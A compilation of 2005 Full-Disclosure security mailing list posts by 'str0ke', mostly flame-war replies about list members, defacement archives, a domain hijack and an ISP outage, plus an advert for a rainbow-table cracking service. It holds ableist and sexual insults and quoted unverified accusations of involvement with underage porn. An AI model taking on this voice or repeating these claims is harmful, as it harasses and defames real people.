below this line is priceless ---

Yo,

Hey John, I want to introduce you to a student of mine, Ryan Coleman.  Ryan
was hoping to correspond with you.

%% Is this the Ryan with the hot mommy?

Ryan is extremely bright, in his early twenties and looking for a break into
the field of security testing.  I am certain anyone who hires Ryan will be
glad they did.

%% Yep, I am sure they will. Another autistic kid trying to join the infosec
%% How many of you are left, outhere?!

On 11/26/05, Ron <[EMAIL PROTECTED]> wrote:
> > Calling someone else a kid
> > just because he has a different mindset or vision is simply childish.
>
> Am I the only one who sees a little bit of irony there?
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: FD list

[str0ke]

K,

You stated yesterday or the day before how you spent $3200 on a class
to teach you how to hack and now you are jumping into telling us how a
defensive role takes more skill then an offensive role.

Take a seat.

/str0ke

On 11/24/05, K Tucker <[EMAIL PROTECTED]> wrote:
> I noticed a few critical comments concerning FD and
> the people that participate. After I made the post
> concerning my bad experience with Intense School's
> Hacker Boot camp, I received many emails from
> subscribers offering a lot of good advice. I think
> that's cool and I thank everyone that took that time
> to write. As far as "white hat script kiddies" etc,
> I wouldn't be too bothered by the adolescent ranting
> of a teenager that has power issues going on in his
> life. My belief is the highest level of "hackers" are
> the so called "white hat" security professionals and
> there is no reason to be embarrassed to be placed in
> that category.  It takes way more skill to play a
> defensive role. If someone doubts that and thinks them
> evil and "leet", try hacking into the Pentagon and see
> what happens to you!
>
>
>
>
> __
> Yahoo! Music Unlimited
> Access over 1 million songs. Try it free.
> http://music.yahoo.com/unlimited/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MBYTESECURITY.ORG RELOADED

[str0ke]

Translation: is shitty since alot of this is slang :)

Monkey1> Oye wey! que paso?
> Pretty much Whats up mofo(cow), whats going on.

Monkey2> Sabes que le robaron el dominio a Megabyte?
> Did you know they robbed the head of Megabyte?

Monkey1> No mames wey, al rey de los simios no le pueden hackear!!!
> No suck mofo(cow).  The king of simios can't hack him.

Monkey2> que si, lo juro por mis pinches huevos mira
http://www.megabytesecurity.org
> For real,  My fucking balls look http://www.megabytesecurity.org

Monkey1> tienes fotos de pandora desnuda?
> Do you have nude photos of pandora.

Monkey2> No ... por que?
> nope why?

Monkey1> Quieres???
> do you want?

MUAHAHAHAH

PWNED!

On 11/4/05, Todd Towles <[EMAIL PROTECTED]> wrote:
> Well all "blackhats" should know how to use Google to do a translation. But 
> since Friday has reduced your "blackhat" power...here you go. Automatic 
> translation is pretty poor in this case. However I am not sure it really 
> helps...lol
>
> ROOLF!!
>
> With date Friday, 04 of November of 2005, 13:35:39, escribio ':
>
> Monkey1 > > Oye wey!  that step?
> Monkey2 > > Sabes that they robbed the dominion to him to Megabyte?
> Monkey1 > > you do not suck wey, to the king of the simios cannot hackear to 
> him!
> Monkey2 > > that if, it right of perpetual ownership by my damned little eggs 
> watches
> Monkey2 > > http://www.megabytesecurity.org
> Monkey1 > > you have photos of naked pandora?
> Monkey2 > > Not... so that?
> Monkey1 > > Quieres?
>  > MUAHAHAHAH
> > PWNED!
>
>
>
>
> > -Original Message-
> > From: [EMAIL PROTECTED]
> > [mailto:[EMAIL PROTECTED] On Behalf Of poo
> > Sent: Friday, November 04, 2005 9:18 AM
> > To: [EMAIL PROTECTED]
> > Cc: full-disclosure@lists.grok.org.uk
> > Subject: Re: [Full-disclosure] MBYTESECURITY.ORG RELOADED
> >
> > perhaps a translation for us non hispanic blackhats?
> >
> >
> > On 11/4/05, Javier Reoyo <[EMAIL PROTECTED]> wrote:
> >
> >
> >   ROOLF!!
> >
> >   Con fecha viernes, 04 de noviembre de 2005, 13:35:39, escribió:
> >
> >   Monkey1>> Oye wey! que paso?
> >
> >   Monkey2>> Sabes que le robaron el dominio a Megabyte?
> >
> >   Monkey1>> No mames wey, al rey de los simios no le
> > pueden hackear!!!
> >
> >   Monkey2>> que si, lo juro por mis pinches huevos mira
> >   Monkey2>> http://www.megabytesecurity.org
> >
> >   Monkey1>> tienes fotos de pandora desnuda?
> >
> >   Monkey2>> No ... por que?
> >
> >   Monkey1>> Quieres???
> >
> >   >  MUAHAHAHAH
> >
> >   >  PWNED!
> >
> >
> >
> >
> >   --
> >   Saludos,
> >   Javier
> > mailto:[EMAIL PROTECTED]
> >
> >   ___
> >   Full-Disclosure - We believe in it.
> >   Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >   Hosted and sponsored by Secunia - http://secunia.com/
> > 
> >
> >
> >
> >
> >
> > --
> > smile tomorrow will be worse
> >
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] new IE bug (confirmed on ALL windows)

[str0ke]

I am actually enjoying this thread.  The shut the fuck up 11 times
repeated was priceless.

Now on another note.  Juan, we don't want emails from you to
full-disclosure whining about class101's 11 fuck u repeats k thnx.

/str0ke (repeat #2)

On 11/2/05, J u a n <[EMAIL PROTECTED]> wrote:
> On 11/2/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> > This appear much correct than to say it is not working on ie6 98se... Im
> > doing a snapshot to prove I haven't made a mistake.
> >
>
> no one care if you've made a mistake or not, is it really that
> important to you to prove yourself right?
> I don't care for messages like this either:
> "Again shut the fuck up , it also crashes on 98SE I have it here IDIOT."
> (repeated 11 times).
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New Online RainbowCrack Engine

[str0ke]

Is your webserver a 9-5 service or is it just down for other reasons?

/str0ke

On 11/1/05, MR BABS <[EMAIL PROTECTED]> wrote:
> Hey guys,
>
> Just finished everything up on RainbowCrack-Online, wasn't sure if
> anyone would be interested, there's a membership fee, as servers, generation
> and cracking machines are expensive, you guys know the score.
>
> Really nice collection of tables, you can take a look-see at
> www.rainbowcrack-online.com.
> Current sets include:
> LanManager-All (all printable chars) 1-14 (the tables are 1-7, but view the
> specs on LM hashing for more info)
>
> NTLM MixAlpha Numeric 1-7
> NTLM LowerAlpha Numeric 1-8
>
> MD5 Alpha Numeric Symbol32 Space 1-7
> MD5 LowerAlpha Numeric Symbol32 Space 1-7
> MD5 LowerAlpha Numeric 1-8
> MD5 MixAlpha Numeric 1-7
>
> SHA1 MixAlpha Numeric 1-7
>
> MySQL 323 MixAlpha Numeric 1-7
>
> CiscoPIX MixAlpha Numeric 1-7
>
> We're almost done generation of MD4, and MySQL SHA1 tables.
>
>
> Should have some articles in Information soon, basically information on what
> to do to leverage knowing hashes. (And how to get the hashes in the first
> place.)
>
>
> For you pen tester fellows, we will be offering the tables for sale to you
> guys, as well as registered businesses, prices should be up later.
>
> -Regards,
>
> Travis
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Third issue of the Zone-H Comics

[str0ke]

Terrorism doesn't always mean death my friend, here is the definition
of terrorism.

ter·ror·ism   Audio pronunciation of "terrorism" ( P )  Pronunciation
Key  (tr-rzm)
n.

The unlawful use or threatened use of force or violence by a
person or an organized group against people or property with the
intention of intimidating or coercing societies or governments, often
for ideological or political reasons.

Im sure "cyber terrorism"  is a threatened use of force or violence on
someones computer (property) with intimidating skiddie talk.

/str0ke

On 9/27/05, Ken Pfeil <[EMAIL PROTECTED]> wrote:
> Since when does a website defacement classify as "cyber terrorism"? Name
> one person that has ever lost their life as a result of a website
> defacement.
>
> One would suggest you buy a fckin clue before letting fly with garbage
> like this.
>
> Ooohh... That's right. I'm sorry. Numbers *and* letters in your handle.
> You must know what you're talking about.
>
> -k
>
> n3td3v wrote:
> > Hi,
> >
> > I have reviewed your site and it sucks.
> >
> > Looks like you're trying to encourage the activity of webpage
> > defacement and bringing celebrity status to those who can deface/
> > submit the most defacements.
> >
> > You make it look legal by saying the site is useful for research, but
> > really, we all know it encourages the malicious kids who submit to the
> > site. I don't know why the security services in the U.S haven't closed
> > you down.
> >
> > Your site is in comparison to asking terrorist bombers to post suicide
> > bombing videos to a website and asking you to look at it. The only
> > difference here is, Zone-H is about cyber terrorism, rather than
> > terrorism in the real world.
> >
> > Do the U.S security services take cyber terrorism as seriously as real
> > world terrorism? And if they do, Why is Zone-H still online?
> >
> > A journalist should ask that question at Bush's next news conference.
> >
> > Also:
> > Are Zone-H admins about to expand the website to allow for suicide
> > bombing video's, or is that different from the cyber terrorism that
> > your site currently supports. And if you don't support cyber
> > terrorism, then why is Zone-H online and why are you an admin of
> > Zone-H.org
> >
> > Thats all for now,
> >
> > Thanks,
> > n3td3v
> >
> >
> > On 9/27/05, Gerardo 'Astharot' Di Giacomo <[EMAIL PROTECTED]> wrote:
> >
> >>Hello,
> >> http://www.zone-h.org
> >> Gerardo 'Astharot' Di Giacomo - Zone-H Admin
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Third issue of the Zone-H Comics

[str0ke]

KF is right on the dot.  There will always be a defacement site.

/str0ke

On 9/27/05, KF (lists) <[EMAIL PROTECTED]> wrote:
> Joxean Koret wrote:
>
> > Yeah but zone-h defacement area its used to make defacing contest...
> >
> >
> So what... so was attrition and safemode...  if its not them someone
> else will archive...
>
> -KF
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Third issue of the Zone-H Comics

[str0ke]

It doesn't encourage defacements?  Come on now its a defacement
archive, ofcourse it encourages defacements.  (Nobody makes me bleed
my own blood, nobody)

I think I finally agree with n3td3v this time on multiple comments
minus the terrorist + sucks + other junk) it is a site dedicated to
defacers who can get the most defacements.)

But thats zone-h's cup of tea not mine, not dogging it just stating
the facts :)  If we were to say zone-h sucks then we would also state
that attrition does since they did the exact thing.  (which attrition
doesn't suck).

/str0ke

On 9/27/05, Richard Horsman <[EMAIL PROTECTED]> wrote:
> n3td3v,
>
> I would compare zone-h more to a newspaper than a terrorists site.
> Newspapers report what is happening in the world whether it's good news
> or bad news. Zone-h brings news about defacements and other security
> related issues, it does not encourage defacements.
>
> Richh
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
> Sent: 27 September 2005 17:10
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Third issue of the Zone-H Comics
>
> Hi,
>
> I have reviewed your site and it sucks.
>
> Looks like you're trying to encourage the activity of webpage
> defacement and bringing celebrity status to those who can deface/
> submit the most defacements.
>
> You make it look legal by saying the site is useful for research, but
> really, we all know it encourages the malicious kids who submit to the
> site. I don't know why the security services in the U.S haven't closed
> you down.
>
> Your site is in comparison to asking terrorist bombers to post suicide
> bombing videos to a website and asking you to look at it. The only
> difference here is, Zone-H is about cyber terrorism, rather than
> terrorism in the real world.
>
> Do the U.S security services take cyber terrorism as seriously as real
> world terrorism? And if they do, Why is Zone-H still online?
>
> A journalist should ask that question at Bush's next news conference.
>
> Also:
> Are Zone-H admins about to expand the website to allow for suicide
> bombing video's, or is that different from the cyber terrorism that
> your site currently supports. And if you don't support cyber
> terrorism, then why is Zone-H online and why are you an admin of
> Zone-H.org
>
> Thats all for now,
>
> Thanks,
> n3td3v
>
>
> On 9/27/05, Gerardo 'Astharot' Di Giacomo <[EMAIL PROTECTED]> wrote:
> > Hello,
> >  http://www.zone-h.org
> >  Gerardo 'Astharot' Di Giacomo - Zone-H Admin
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> **
> NEW: Sec-1 Hacking Training - Learn to breach network security to further 
> your knowledge and protect your network 
> http://www.sec-1.com/applied_hacking_course.html
> **
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Request to publish your Proof of Concept (esc1.html)

[str0ke]

Georgi your so mean.  Do you really get angry when people publish it anyways?

/str0ke

On 9/26/05, Georgi Guninski <[EMAIL PROTECTED]> wrote:
> no.
>
> you don't have my permission.
> try buying a licence with ca$h.
>
> --
> where do you want bill gates to go today?
>
> On Mon, Sep 26, 2005 at 12:02:35PM +0300, SecuriTeam News wrote:
> > Hello,
> >
> > We at securiTeam writing about the Gecko bug of:
> > https://bugzilla.mozilla.org/show_bug.cgi?id=303213
> > You have mention on the source file that it cannot be used in vulnerability
> > databases. And we asking for your permission to publish it in our web site.
> >
> >
> > Regards,
> > Ido
> > --
> > SecuriTeam News
> > Beyond Security
> >
> > http://www.beyondsecurity.com
> > http://www.securiteam.com
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

re:[Full-disclosure] Google Secure Access or "How to have people download a trojan."

[str0ke]

Dear Mr. Ass-Hat (aka,  Yvan Boily):

Nice job shitting on someones email with name calling and childish
remarks.

Remember to clean your Pot its getting Black:

"Before you go off FREAKING out you might want to consider a few things,
first:"

You seemed to be the one FREAKEING out.  Let me state a few steps that
can help you in life when you read other peoples emails in the future.

1) Breathe deeply, from your diaphragm; breathing from your chest won't
relax you. Picture your breath coming up from your "gut."

2) Slowly repeat a calm word or phrase such as "relax", "take it easy".
Repeat it to yourself while breathing deeply.

3) Use imagery; visualize a relaxing experience, from either your memory
or your imagination.

4) Non-strenuous, slow yoga-like exercises can relax your muscles and make
you feel much calmer.

Remember if these 4 steps dont help you with your EMAIL RAGE.  Please be
sure to seek help at an EMAIL RAGE clinic.

/str0ke
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Drama: Venomous and his F-D folder

[str0ke]

n3td3v,

Its funny how you pick 1 person out of the bunch that complained on the
list.

Your child porn blah is kind of funny since VeNoMouS used to host
Condemned.org, I would hope you know what condemned.org is since your
webpage states you have Extensive on hands hacker scene experience (6+
years) (Knowing your enemy). lmfao

Shit if you dont like VeNoMouS send him a private email no one cares about
your little ego trip you have going on.  Just because you joined a board

(http://forum.crime-research.org/profile.php?mode=viewprofile&u=8)

and think you are a private eye now.

And then you stated, "I have more ammo to post on your internet activities
later.".  Who gives a flying shit.

VeNoMouS is full of himself, look in the mirror.

/str0ke

On 9/10/05, n3td3v <[EMAIL PROTECTED]> wrote:
> "My full-disclosure folder"
>
> Venomous, you're full of yourself. By trying to isolate yourself from
> "kids" makes you more guilty of being directly involved in the "kid
> scene" of the security community. You're already known to be a regular
> of such channels as "#hackphreak" and others. Enough said.
>
> You open your "Full-Disclosure folder" every minute of everyday,
> infact I doubt it rarely gets closed. Script kids who try and justify
> themselves as not being one is funny to watch. Lets get real, you're
> no hacker.
>
> Venomous will be "walking" from this list I suspect when "the kids"
> get a half term Holiday from College/university. More bullshit.
>
> No one is walking, no one cares about the immature shit, you and
> others class as "the kids". Everyone is happy with the way this list
> is. Final thought, this thread is a random bitch about nothing.
>
> Do you think because "the kids" are at school, they don't have
> internet access? This thread, no credibility.
>
> Speaking of kids Venomous, I heard you run porn sites where you try
> and attract female script kids from IRC to post their naked pictures
> on, half of those females barely looked the age to be on a porn site.
> You haven't been seen on "#hackphreak" since. Explain to F-D your
> actions in regard to your underage IRC porn ventures or STFU on F-D.
>
> I have more ammo to post on your internet activities later.
>
> Have a nice day,
>
> n3td3v
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IMAP scans? Something going on I should knowabout?

[str0ke]

Ahh sorry about the last post it really doesn't give you the information
you needed, long party night.

A search with just imap on mil's db will show that 3 exploits have been
released this month so it should of been obvious that the scans would
start showing up.

http://www.milw0rm.com/search.php?dong=imap

/str0ke


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Beware trojaned exploits!

[str0ke]

/* we all know that you are a stupid backd00r spreader str0ke ;)) */
I always come thru the fr0ntd00r :P

On another note anyone have access to dikline.com's sine?  I want to read

[frsirtg0.txt] 07-21-05 [ 33067] [/home/frsirt/www] [june] [fucking
gotcha!]

/str0ke
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Beware trojaned exploits!

[str0ke]

/*
Hmm, I'm noticing a pattern.

Warning: don't download exploits from any sites that have an 'o'
replaced with a '0'!  The 0 obviously makes them less secure, or
something.
*/

Oh crap let me go register milworm.com so I can be a little more
secure in the eyes of a battle.net bot developer.

lmfao

/str0ke
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] COX Internet Outage

[str0ke]

sargon >>
Ermmm, how did you determine this?
>>

Well I have 59 cox communications lines in 59 different cities.  They all
went down at the same time.  dslreports + technical staff stated they are
having a nation wide problem right now, their entire system is down.

So thats how I determined this.

/str0ke
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] COX Internet Outage

[str0ke]

COX Internet's entire network colapsed.

I haven't seen an ISP that was world wide ever have all its eggs in one
basket until now, I guess the what if never crossed their minds.  Well
maybe a few occasions but not world wide outage.

Funny.

/str0ke


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Asshat coders

[str0ke]

This atleast gave me a laugh with all that was stated so far.

-sd-
How goes it sd,

Very much a pleasure.  Removed your code.

/str0ke
--sd-

I like pissing wars when I get placed into it.  Vagina in the sand was the
funny part and I dont think I could beat that.

KF u sexy mofo.

>
I actually wonder whether this list has become the hangout place for all
lameness of seclists.

Any plan of action, or should I too just attempt learning to ignore this?
Who
was that guy who ran a moderated version of this list again?

Regards, Anders Breindahl.
>

And you keep reading the emails is the funny part -> filter header ->
elsewhere.

>
Can you guys take this childish shit elsewhere
Thanks!
>

HAHAHAHAHHAHA

/str0ke
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/